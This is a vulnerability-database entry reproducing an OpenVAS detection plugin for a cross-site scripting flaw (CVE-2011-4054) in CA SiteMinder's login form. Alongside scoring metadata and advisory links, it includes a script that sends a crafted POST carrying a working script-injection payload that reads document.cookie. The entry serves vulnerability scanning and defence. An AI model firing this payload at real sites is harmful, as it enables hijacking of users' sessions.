Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2011 Greenbone AGOPENVAS:1361412562310902800
HistoryDec 19, 2011 - 12:00 a.m.

CA SiteMinder 'target' Parameter Cross-Site Scripting Vulnerability

2011-12-1900:00:00
Copyright (C) 2011 Greenbone AG
plugins.openvas.org
241

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

5.7

Confidence

High

EPSS

0.002

Percentile

52.2%

JSON

CA SiteMinder is prone to a cross-site scripting (XSS) vulnerability.

# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.902800");
  script_version("2023-10-27T05:05:28+0000");
  script_cve_id("CVE-2011-4054");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"last_modification", value:"2023-10-27 05:05:28 +0000 (Fri, 27 Oct 2023)");
  script_tag(name:"creation_date", value:"2011-12-19 16:16:16 +0530 (Mon, 19 Dec 2011)");
  script_name("CA SiteMinder 'target' Parameter Cross-Site Scripting Vulnerability");

  script_xref(name:"URL", value:"http://secunia.com/advisories/47167");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/50962");
  script_xref(name:"URL", value:"http://securitytracker.com/id/1026394");
  script_xref(name:"URL", value:"http://www.kb.cert.org/vuls/id/713012");
  script_xref(name:"URL", value:"https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={A7DA8AC2-E9B4-4DDE-B828-098E0955A344}");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2011 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to insert arbitrary HTML
  and script code, which will be executed in a user's browser session in the context of an affected site.");

  script_tag(name:"affected", value:"CA SiteMinder R6 SP6 CR7 and earlier
  CA SiteMinder R12 SP3 CR8 and earlier");

  script_tag(name:"insight", value:"The flaw is due to improper validation of user-supplied input passed
  to the 'target' POST parameter in login.fcc (when 'postpreservationdata' is
  set to 'fail'), which allows attackers to execute arbitrary HTML and script
  code in a user's browser session in the context of an affected site.");

  script_tag(name:"solution", value:"Upgrade to CA SiteMinder R6 SP6 CR8, R12 SP3 CR9 or later.");

  script_tag(name:"summary", value:"CA SiteMinder is prone to a cross-site scripting (XSS) vulnerability.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_analysis");
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");

port = http_get_port(default:80);

host = http_host_name(port:port);

foreach dir (make_list_unique("/siteminderagent", "/siteminder", http_cgi_dirs(port:port)))
{

  if(dir == "/") dir = "";

  url = dir + "/forms/login.fcc";
  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req);

  if("<title>SiteMinder" >< res)
  {
    postData = 'postpreservationdata=fail&target="><script>alert(document.' +
               'cookie)</script><"';
    req = string("POST ", url, " HTTP/1.1\r\n",
                 "Host: ", host, "\r\n",
                 "Content-Type: application/x-www-form-urlencoded\r\n",
                 "Content-Length: ", strlen(postData), "\r\n",
                 "\r\n", postData);

    ## Send crafted POST request and receive the response
    res = http_keepalive_send_recv(port:port, data:req);

    if(res =~ "^HTTP/1\.[01] 200" && '><script>alert(document.cookie)</script>' >< res)
    {
      security_message(port:port);
      exit(0);
    }
  }
}

exit(99);

Related

cert 1
prion 1
securityvulns 2
cvelist 1
cve 1
nvd 1
cert
cert
CA Siteminder login.fcc form xss vulnerability
2011-12-07 00:00:00
prion
prion
Cross site scripting
2011-12-08 11:55:00
securityvulns
securityvulns
CA20111208-01: Security Notice for CA SiteMinder
2011-12-11 00:00:00
CA SiteMidner crossite scripting
2011-12-11 00:00:00
cvelist
cvelist
CVE-2011-4054
2011-12-08 11:00:00
cve
cve
CVE-2011-4054
2011-12-08 11:55:01
nvd
nvd
CVE-2011-4054
2011-12-08 11:55:01

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

5.7

Confidence

High

EPSS

0.002

Percentile

52.2%

JSON
Related for OPENVAS:1361412562310902800
cert1prion1securityvulns2cvelist1cve1nvd1